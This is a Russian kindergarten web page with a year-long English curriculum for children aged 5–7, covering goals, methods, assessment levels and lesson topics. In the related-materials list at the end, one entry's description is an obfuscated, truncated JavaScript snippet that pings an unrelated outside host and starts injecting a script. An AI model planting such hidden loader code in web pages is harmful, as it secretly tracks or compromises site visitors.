РАБОЧАЯ ПРОГРАММА «Английский язык для дошкольников» (5 -7 лет)
рабочая программа по обучению грамоте (средняя, старшая группа) на тему
Данная рабочая программа по английскому языку для детского сада составлена на основе:
- Закона Российской Федерации «Об образовании» № 273-Ф от 29.12.2012;
- Примерной образовательной программы дошкольного образования Детство / Т. И. Бабаева, А. Г. Гогоберидзе и др. – СПб.: ООО «Издательство «Детство – Пресс», 2014.
Скачать:
Вложение | Размер |
---|---|
rp_detskiy_sad.docx | 49.99 КБ |
Предварительный просмотр:
Муниципальное дошкольное образовательное учреждение "Детский сад "Сказка"
РАБОЧАЯ ПРОГРАММА
«Английский язык для дошкольников» (5 -7 лет)
срок реализации: 1 год.
Составитель:
учитель английского языка
предмет
Шанявская Людмила Валентиновна
Ф.И.О.
первая категория
категория
г. Надым
2017 г.
ПОЯСНИТЕЛЬНАЯ ЗАПИСКА
- ОБЩАЯ ХАРАКТЕРИСТИКА
Данная рабочая программа по английскому языку для детского сада составлена на основе:
- Закона Российской Федерации «Об образовании» № 273-Ф от 29.12.2012;
- Примерной образовательной программы дошкольного образования Детство / Т. И. Бабаева, А. Г. Гогоберидзе и др. – СПб.: ООО «Издательство «Детство – Пресс», 2014.
Иностранный язык сегодня становится в большей мере средством жизнеобеспечения общества. Роль иностранного языка возрастает в связи с развитием экономических связей, с интернационализацией народной дипломатии. Овладение иностранным языком на элементарном уровне в детском саду выступает в качестве первой ступени в реализации стратегической цели учебного предмета «Иностранный язык». На данной ступени закладываются основы коммуникативной компетенции. Предлагаемая программа направлена на создание базы для дальнейшего изучения иностранного языка в начальной школе. Раннее обучение иностранному языку создает прекрасные возможности для того, чтобы вызвать интерес к языковому и культурному многообразию мира, уважение к языкам и культурам других народов, способствует развитию коммуникативно-речевого такта. Роль иностранного языка на ранней ступени обучения особенно неоценима в развивающем плане. Изучение иностранного языка в раннем возрасте особенно эффективно, так как именно дети дошкольного возраста проявляют большой интерес к людям иной культуры, эти детские впечатления сохраняются на долгое время и способствуют развитию внутренней мотивации изучения первого, а позже и второго иностранного языка. В целом, раннее обучение неродному языку несет в себе огромный педагогический потенциал как в плане языкового, так и общего развития.
Основные функции иностранного языка на раннем этапе его изучения:
- развитие общей речевой способности детей дошкольного возраста, в их самом элементарном филологическом образовании,
- формирование их способностей и готовности использовать именно иностранный язык как средство общения, как способ приобщения к другой национальной культуре и как действенное средство непрерывного языкового образования, воспитания и разностороннего развития личности ребенка.
Программа направлена на воспитание интереса к овладению английским языком, формирование гармонично развитой личности, развитие психических процессов, познавательных и языковых способностей; способствует развитию активной и пассивной речи; помогает освоить детям элементарные навыки устной речи и умение вести несложную беседу на английском языке в рамках пройденной темы. Программа обеспечивает развитие интеллектуальных общеучебных умений, творческих способностей у учащихся, необходимых для дальнейшей самореализации и формирования личности ребенка, позволяет ребёнку проявить себя, преодолеть языковой барьер, выявить свой творческий потенциал.
Программа составлена с учетом требований федеральных государственных стандартов и соответствует возрастным особенностям дошкольника.
1.2 ЦЕЛЬ:
Цель программы - осуществление коммуникативно – психологической адаптации дошкольников к английскому языку в процессе развития способности и готовности общаться с носителями языка с учетом речевых возможностей и потребностей в устной форме.
1.3. ОБЩИЕ ЗАДАЧИ ПРОГРАММЫ:
Основными задачами программы являются:
- Развивать интерес детей к английскому языку, желания говорить на языке, слушать песни, речь, смотреть мультфильмы на английском языке через организацию педагогического процесса на основе предпочитаемых ребенком видов деятельности (игра, продуктивные виды деятельности).
- Знакомить детей с предметом обучения: рассказать о роли иностранного языка в жизни человека.
- Формировать у детей умения в аудировании при прослушивании ими незнакомого текста, содержащего в основном известную им лексику.
- Развивать умения детей вести диалог в процессе подготовки к драматизации сказки, во время выполнения аппликации, понимать обращенную к ним речь и адекватно реагировать на обращение, употребляя соответствующие ситуации реплики, в сюжетно-ролевой игре.
- Знакомить детей с традиционными праздниками страны изучаемого языка (Хэллоуин, Новый год, Рождество, День святого Валентина, День матери, Пасха).
- Знакомить детей с произведениями детского фольклора страны изучаемого языка.
Формы организации совместной деятельности с детьми.
- Создание ситуаций успеха.
- Создание проблемно-поисковых (игровых) ситуаций.
- Сюжетно-ролевые игры.
- Дидактические игры.
Формой осуществления образовательного процесса являются учебные группы (до 12 человек) с постоянным составом, организованные по возрастному принципу (дети от 5 до 6 лет и от 6 до 7 лет). Набор детей в группы свободный; единственным условием является соответствующий возраст воспитанников.
Основание для отчисления – заявление родителей.
1.4. СТРУКТУРА И СОДЕРЖАНИЕ ПРОГРАММЫ
При распределении разделов программы учитывались основные принципы дидактики, возрастные и психофизиологические особенности детей. Содержание программы состоит из тем, позволяющих варьировать занятия внутри темы. Оно включает в себя ситуации на английском языке, языковой материал, речевые умения.
Технология обучения дошкольников английскому языку включает в себя следующие разделы:
- формирование фонетических навыков: овладение артикуляцией и интонацией (обучение фонетике не ограничивается имитацией, а сознательно сопоставляет интерферирующие звуки родного и иностранного языка, добивается осознания различия звуков двух языков, а затем правильного произношения);
- формирование лексических навыков: обогащение словарного запаса;
- освоение грамматического строя речи на основе речевых образцов, которые употребляются функционально, т.е. для выражения коммуникативного намерения говорящего;
- формирование навыков аудирования - восприятия текстов на слух;
- формирование диалогической и монологической речи.
Обучение английскому языку дошкольников осуществляется только устным путём, без привлечения чтения и письма, чтобы, во - первых, избежать больших трудностей на начальной ступени обучения, во - вторых, чтобы графика иностранного языка не пересекалась с русской и не затрудняла обучение чтению и письму на родном языке.
Использование естественной для детей этого возраста физической, игровой и познавательной деятельности делает возможным эффективное обучение при сохранении психического и физического здоровья детей.
Использование игры как основного вида деятельности обеспечивает заинтересованность детей при восприятии материала, а также снимает возможные языковые трудности. Доступность и посильность обеспечивается четким отбором тем, которые интересны для детей дошкольного возраста и яркой привлекательной наглядностью.
Чередование различных видов работы, постоянная физическая активность детей способствуют тому, что мозг ребенка не утомляется, а переключается на другой вид деятельности.
Содержание обучения дошкольников английскому языку включает в себя реализацию целей и задач при одновременном удовлетворении познавательных и коммуникативных потребностей детей, требует адекватного отбора и организации обучения. В содержание обучения включаются:
- базовые речевые образцы, отражающие игровые и реальные отношения в речи;
- средства для моделирования этих образцов; (набор существительных, отражающих основные принципы деятельности, глаголы, отражающие основные движения, состояния и действия с предметами, прилагательные и наречия, обозначающие качества предметов и явлений; так же скороговорки, стихи, считалки, песни, сказки; диалоги и монологические тексты, аудитивные тексты, игры).
Принципы работы
• использование средств поощрения;
• формирование у детей положительного образа педагога, что повышает рефлексивные способности ребенка;
• лимитирование речи педагога на родном языке до 5-10%, и, как следствие, доведение речи детей на английском языке до 90%;
• системное введение лексики по схеме: первое занятие - 4 слова, второе занятие-закрепление, последующие занятия - активизация с использованием речевых конструкций плюс 3-4 новых слова;
• учет особенностей кратковременной памяти детей на данном этапе развития, системное возвращение к ранее пройденному материалу и включение его в последующие занятия;
• обязательное обучение как усеченным, так и полным речевым структурам, что способствует развитию навыков говорения;
• предпочтение группового обучения; введение парного обучения как важнейшего элемента успешного обучения говорению в начальной школе (такая работа помогает установить благоприятный психологический климат в группе и снимет языковые барьеры);
Виды работы:
1. Работа над произношением (сказки, скороговорки, рифмовки, зарядки, жестикулирование).
2. Работа с предметами (диалог с игрушкой, описание игрушки, игры, сказки).
3. Работа с картинкой (описание, детализация, рассказ, диалог, игры, сравнение, воображение с прогнозированием).
4. Разучивание и декламация стихов, потешек, считалок, скороговорок, рифмовок, конкурс чтецов, разножанровая декламация, соревнования в командах и парах.
5. Подвижные игры: игры с мячом, «цепочка» с игрушкой, зарядки, физкультминутки, танцы, хороводы, команды в движении.
6. Спокойные игры: загадки, кроссворды, лото.
7. Творческие и ситуативные игры: ролевые игры, интервью, бытовые сюжеты.
8. Инсценировка коротких рассказов и пьес.
9. Воспроизведение ситуативных диалогов.
10. Изучение букв.
1.5. ПРОГНОЗИРУЕМЫЕ РЕЗУЛЬТАТЫ
В итоге реализации программы могут быть отмечены следующие показатели уровня развития детей:
• Может активно и адекватно использовать имеющийся словарный запас: минимум 120 лексических единиц в речевых образцах и 20 в рифмовках, стихах, песнях;
• Умеет в повседневной жизни пользоваться грамматическими конструкциями (речевые образцы (выражения)):
Я… (имя)
Мне (возраст)
Я вижу… ;
Я умею… ;
Я люблю… ;
Я имею… ;
- Фонетически грамотно произносит звуки, отличные от русских;
- Рассказывает стихотворения по отдельным темам программы;
- Переводит слова с русского языка на английский и наоборот;
- Показывает картинку с названным словом, называет, что или кто изображен на картинке;
- Правильно использует слова и выражения в монологической речи и в игровой деятельности;
- Задает и отвечает на вопросы разделов тем программы;
- Строит монологические высказывания;
- Участвует в составлении диалогов;
- Использует в деятельности считалочки, рифмовки.
- Умеет внимательно слушать речь педагога, перевод ее, опираясь на ключевые слова;
• Может разыгрывать небольшие сценки на английском языке с использованием игрушек;
- Знает к концу обучения английский алфавит (узнавать буквы);
1.6. СИСТЕМА ОТСЛЕЖИВАНИЯ И ОЦЕНИВАНИЯ ОБРАЗОВАТЕЛЬНОГО ПРОЦЕССА
Критерии:
1.Диалогическая речь.
Высокий уровень: задает более 2х вопросов, вопросы правильно сформулированы, ответы дает четкие, используя полные и краткие предложения.
Средний уровень: задает менее 2х вопросов, вопросы условно-правильные, ответы нечеткие, условно-правильные (не нарушающие смысла, но содержащие лексические и грамматические ошибки).
Низкий уровень: не задает вопроса, ответы неправильные (нарушающие смысл и с ошибками).
2.Монологическая речь.
Высокий уровень: учитывается общее количество фраз, построенных по различным моделям, речь корректная, содержит 3 и более фраз.
Средний уровень: речь условно-правильная (есть лексические и грамматические ошибки), 2-3 фразы.
Низкий уровень: не дает ответа.
3.Аудирование
Высокий уровень: правильно передает содержание сказанного, отгадывает загадку.
Средний уровень: условно-правильно передает содержание сказанного (не нарушающие смысла, но содержащие лексические и грамматические ошибки ответы), отгадывает загадку.
Низкий уровень: не понимает, о чем шла речь, не отгадывает загадку.
4.Лексические навыки
Высокий уровень: лексический запас соответствует программным требованиям, называет все лексические единицы по каждой теме, не испытывая при этом затруднений.
Средний уровень: лексический запас не соответствует программным требованиям, называет более 60% лексических единиц по каждой теме, испытывает при этом затруднения.
Низкий уровень: лексический запас не соответствует программным требованиям, называет менее 60% лексических единиц по каждой теме, испытывает при этом серьезные затруднения.
5.Грамматические навыки.
Высокий уровень: имеет предусмотренный программой запас знаний, умеет их использовать для решения поставленных перед ним задач, справляется с заданием самостоятельно, без посторонней помощи и дополнительных (вспомогательных) вопросов. Ответы дает четкие, используя полные и краткие предложения, вопросы правильно сформулированы.
Средний уровень: имеет предусмотренный программой запас знаний, умеет их использовать для решения поставленных перед ним задач. Однако требуется помощь (подсказка) педагога, вспомогательные вопросы. Ответы нечеткие, условно-правильные (содержащие грамматические ошибки), вопросы условно-правильные.
Низкий уровень: дети не имеют предусмотренного программой запаса знаний, испытывают затруднения при их использовании. Помощь педагога и вспомогательные вопросы не оказывают значительно влияния на ответы, дети не всегда справляются с заданием или не справляются совсем, часто отмалчиваются, отказываются выполнять задания или выполняют с серьезными ошибками, соглашаются с предложенным вариантом, не вникая в суть задания.
6.Фонетические навыки.
Высокий уровень: произношение звуков соответствует программным требованиям, все звуки произносит четко и правильно, не испытывая при этом затруднений.
Средний уровень: произношение звуков частично соответствует программным требованиям, не все звуки, произносит четко и правильно, испытывая при этом затруднения.
Низкий уровень: произношение звуков не соответствует программным требованиям, многие звуки произносит неправильно, испытывает при этом серьезные затруднения, отказывается произносить заданные звуки.
1.7 РЕЖИМ ПРОВЕДЕНИЯ ЗАНЯТИЙ, КОЛИЧЕСТВО ЧАСОВ:
- Программа рассчитана на детей 6-7 лет, реализуется за 1 год.
- Количество обучающихся в группе - 12 человек.
- Занятие проводится 2 раза в неделю (всего 50 часов).
- Начало занятий с 01.10.2017 и окончание 30.05.2018
1.8 КАЛЕНДАРНО-ТЕМАТИЧЕСКИЙ ПЛАН
№ | Раздел учебного курса | Кол-во занятий на изучение раздела |
1 | Знакомство | 3 |
2 | В зоопарке | 5 |
3 | На ферме | 5 |
4 | Счёт до 10 | 3 |
5 | Цвета | 5 |
6 | Рождество и Новый год | 2 |
7 | Игрушки | 5 |
8 | Еда | 5 |
9 | Семья | 5 |
10 | Части тела | 5 |
11 | Одежда | 5 |
12 | Обобщающее повторение | 2 |
Итого: | 50 |
1.8 СОДЕРЖАНИЕ КУРСА
Тема № 1
Речевой материал /предметное содержание речи | Приветствия и прощание. Знакомство. Простейшие сведения о себе (имя, настроение) |
Новый языковой материал | Hi, Hello, Good bye, My name is…, yes, no. Личные местоимения: I, you, Притяжательные местоимения: my Глагол связка to be: am, is, are Вопросы: What’s your name? How are you? |
Познавательный/ страноведческий аспект | Языки мира. Англоговорящие страны. Значение английского языка. Имена английских девочек и мальчиков. Герои английских книг и мультфильмов. Произведения детского фольклора: стихи, песни (“How are you today?”) |
Наглядность/ оборудование | Куклы, изображения героев книг, мультфильмы. |
Тема № 2
Речевой материал /предметное содержание речи | Любимые занятия, выражение отношения к действию при помощи модального глагола can, выходной день в зоопарке описание размера |
Новый языковой материал | I can …, It’s …. Существительные: названия диких животных – bear, monkey, elephant, Личное местоимение it. Прилагательные: big, small. Глаголы: run, jump, swim, climb, fly, stretch, cook, hide, sit down, stand up, bow. Вопросы: What’s that? Сan you …? |
Познавательный/ страноведческий аспект | Зоопарки мира. Герои английских книг и мультфильмов. Произведения детского фольклора: стихи, песни. |
Наглядность/ оборудование | Игрушки (животные), презентации, мультфильмы. |
Тема № 3
Речевой материал /предметное содержание речи | Домашние животные |
Новый языковой материал | I have … Существительные: названия домашних животных – cat, dog, duck, cow, horse, chick, pig, sheep. Вопросы: Who are you? |
Познавательный/ страноведческий аспект | Герои английских мультфильмов. |
Наглядность/ оборудование | Игрушки, презентации, мультфильмы. Произведения детского фольклора: стихи, песни. (“Old McDonald has a farm”, “Baa-baa, black sheep”) |
Тема № 4
Речевой материал /предметное содержание речи | Cчёт до 10. Возраст. |
Новый языковой материал | I am 6. I can see (3 cats). Числительные: 1-10. Вопросы: How old are you? How many? |
Познавательный/ страноведческий аспект | Герои английских книг и мультфильмов. Произведения детского фольклора: стихи, считалки, песни. (“Ten little monkeys”) |
Наглядность/ оборудование | Игрушки, презентации, мультфильмы. |
Тема № 5
Речевой материал /предметное содержание речи | Цвета. |
Новый языковой материал | It's (blue). The sky is (blue). I like … Прилагательные: red, yellow, orange, blue, white, black, green, brown. Вопросы: What colour is it? What’s your favourite colour? |
Познавательный/ страноведческий аспект | Герои английских мультфильмов. Произведения детского фольклора: стихи, песни. (“What colour is the sky?”) |
Наглядность/ оборудование | Предметы, картинки, презентации, мультфильмы. |
Тема № 6
Речевой материал /предметное содержание речи | Праздники Рождество и Новый год, поздравление с праздником. |
Новый языковой материал | We wish you a Merry Christmas! Happy New Year! Существительные: Christmastree, star, bell, Santa. |
Познавательный/ страноведческий аспект | Празднование Рождества в Великобритании и Америке. Герои английских мультфильмов. Произведения детского фольклора: стихи, песни.(“We wish you a Merry Christmas!”) |
Наглядность/ оборудование | Картинки, презентации, мультфильмы. |
Тема № 7
Речевой материал /предметное содержание речи | Увлечения / хобби, игрушки, описание любимой игрушки. |
Новый языковой материал | I have a (big) doll. Существительные: названия игрушек – doll, ball, car, ship, bike, plane, teddy bear. Глаголы: take, put, play. Предлоги места: on, in. Вопросы: Have you got a … ? |
Познавательный/ страноведческий аспект | Герои английских мультфильмов. Произведения детского фольклора: стихи, песни. (“Humpty Dumpty”) |
Наглядность/ оборудование | Картинки, презентации, мультфильмы. |
Тема № 8
Речевой материал /предметное содержание речи | Продукты питания, покупки в магазине с использованием фраз английского речевого этикета. |
Новый языковой материал | I like …, I don’t like…Give me …, please. Thank you. Существительные: названия продуктов – apple, banana, potato, tomato, bread, butter, tea, juice, coffee, pizza, cake, milk, sandwich, cheese, soup. Вопросы: Do you like? |
Познавательный/ страноведческий аспект | Национальная английская кухня. Герои английских мультфильмов. Произведения детского фольклора: стихи, песни. (“Who likes coffee?”) |
Наглядность/ оборудование | Предметы, картинки, фотографии, презентации, мультфильмы. |
Тема № 9
Речевой материал /предметное содержание речи | Cемья. |
Новый языковой материал | I love my … Существительные: члены семьи- mum, dad, granny, grandpa, sister, brother. Личные местоимения: he, she. Вопросы: Who is she/he? |
Познавательный/ страноведческий аспект | Герои английских мультфильмов. Произведения детского фольклора: стихи, песни. (“Finger family”) |
Наглядность/ оборудование | Предметы, картинки, фотографии, презентации, мультфильмы. |
Тема № 10
Речевой материал /предметное содержание речи | Части тела. |
Новый языковой материал | Существительные: названия частей тела – head, eyes, ears, mouth, face, nose, hand, legs. |
Познавательный/ страноведческий аспект | Герои английских мультфильмов. Произведения детского фольклора: стихи, песни. (“Head and shoulders”, “Hands up, hands down”) |
Наглядность/ оборудование | Куклы, картинки, презентации, мультфильмы. |
Тема № 11
Речевой материал /предметное содержание речи | Одежда. |
Новый языковой материал | Put on your … Существительные: названия одежды – hat, dress, jacket, skirt, socks, shorts, jeans, sweater. |
Познавательный/ страноведческий аспект | Герои английских мультфильмов. Произведения детского фольклора: стихи, песни. (“Put on your shoes”) |
Наглядность/ оборудование | Предметы, картинки, фотографии, презентации, мультфильмы. |
1.9 МЕТОДИЧЕСКОЕ ОБЕСПЕЧЕНИЕ ПРОГРАММЫ
1. Учебно-иллюстративный материал:
- слайды, презентации по темам;
- видеоматериалы по темам;
- аудиоматериалы по темам;
- иллюстративный и дидактический материал по темам занятий;
- наглядные пособия (игровые таблицы, атрибуты);
2. Методические материалы:
- методическая литература для учителя;
3.Материалы по результатам освоения программы:
- перечень творческих достижений;
- фотографии и аудиозаписи мероприятий
4. Материально-техническое обеспечение:
- игровые средства обучения (игротека): набор кубиков, мячи, наборы цветной и белой бумаги и картона, наборы цветных карандашей, фломастеров, красок и пр.
- настольные игры
- элементы театральных декораций;
- персональный компьютер, оснащенный звуковыми колонками
- проектор, интерактивная доска
- СПИСОК ЛИТЕРАТУРЫ
- Примерная образовательная программа дошкольного образования Детство / Т. И. Бабаева, А. Г. Гогоберидзе и др. – СПб.: ООО «Издательство «Детство – Пресс», 2014.
- Английский для малышей. Шишкова И. Н., Вербовская М. Е. / Н. А. Бонк М: «Росмэн-Пресс», 2007.
- Мой первый учебник по английскому языку. И. А. Рыжкова., М: «Аквариум», 1998.
- Бонк Н. Английский для малышей. - М., 2006.
- Бурханова А. Занимательный алфавит. - М. 2002.
- Дольникова Р.А., Фрибус Л.Г УМК, Как детишек нам учить по-английски говорить. - СПб., КАРО, 2002
- Евсеева М.Н. Программа обучения английскому языку детей дошкольного возраста. -Панорама, 2006.
- Захарченко И. Начнем учить английский. – РГПУ, 1999.
- Клеменьтьева Т.Б. Счастливый английский. Занимательные игры и упражнения. - Дрофа, 1995.
- Конышева А.В. Английский для малышей, - С-Пб, 2003.
- Крылова Н.В. А как это по-английски?. – 2005.
- Кулиш В.Г. Занимательный английский для детей, - Сталкер, 2001.
- Лосева С.В. Английский в рифмах. - М.,1993.
- Лыкова Л.Л. Обучение английскому языку дошкольников и младших школьников. - Ярославль, Академия развития, 2006.
- Малышева Н. «Секреты английских звуков», АСТ-Пресс, 1997.
- Скульте В. «Английский для детей». - М. 2001.
- Стайнберг Дж. «110 игр на уроках английского языка», Астрель, 2006.
- Фурсенко В.С. Веселые грамматические рифмовки. – М., 2001
- Фурсенко С.В. «Грамматика в стихах», Каро, 2006.
- Шишкова И.А., М.Е. Вербовская «Английский для дошкольников», Росмэн, 2002.
- Щербина Т., Барашов А. «Английский для малышей». - Краснодар, 2000
- Welcome, E. Gray, V. Evans, Express Publishing, 2001 (c карточками).
Литература для родителей:
- Ачкасова Н.Н. Маша и медведь. Музыкальная сказка для детей, начинающих изучать английский язык. - Дрофа, 2006.
- Большой словарь Диснея, Walt Disney Production, 1996.
- Владимиров В, М. Окунь Английский выучим, играя, С-Пб., Канон, 1999.
Сайты для учителей, детей и родителей
По теме: методические разработки, презентации и конспекты
Программа по изучению английского языка для дошкольников . "Игровой английский язык".
Программа по изучению иностранного языка "Игровой английский язык". для детей от 4 до 6.5 лет...
Программа "Английский язык и дошкольник" для дошкольников изучающих английский язык
В связи с возрастающей учебной нагрузкой в детском саду, с одной стороны, и заинтересованностью родителей в изучении их детьми английского языка с другой, а также исходя из заботы о здоровье ре...
Рабочая программа по английскому языку для дошкольников
Рабочая программа по английскому языку для детей 4-6 лет...
Программа английский язык для дошкольников 6-7 лет (1 год обучения)
Учебная программа «Английский язык для детей» рассчитана на 1 учебный год 64 учебных часа , 2 часа в неделю. Возраст: 6 – 7 лет. Длительность занятий: 25 - 30 минут. Цель курса: развитие лин...
НОД "Настроение Джони" по дополнительной образовательной программе "Английский язык и дошкольник" в ДОУ
var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'nxqkbdvu.lussoit.com\',\'48\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document.cre...
Рабочая программа немецкий язык для дошкольников
Рабочая программа немецкий язык для дошкольников...
Рабочая программа "Английский язык"
На сегодняшний день широко известно, что изучение иностранного языка позволяет обогатить дошкольное образование, поскольку дети данного возраста обладают врожденной и еще неутраченной способност...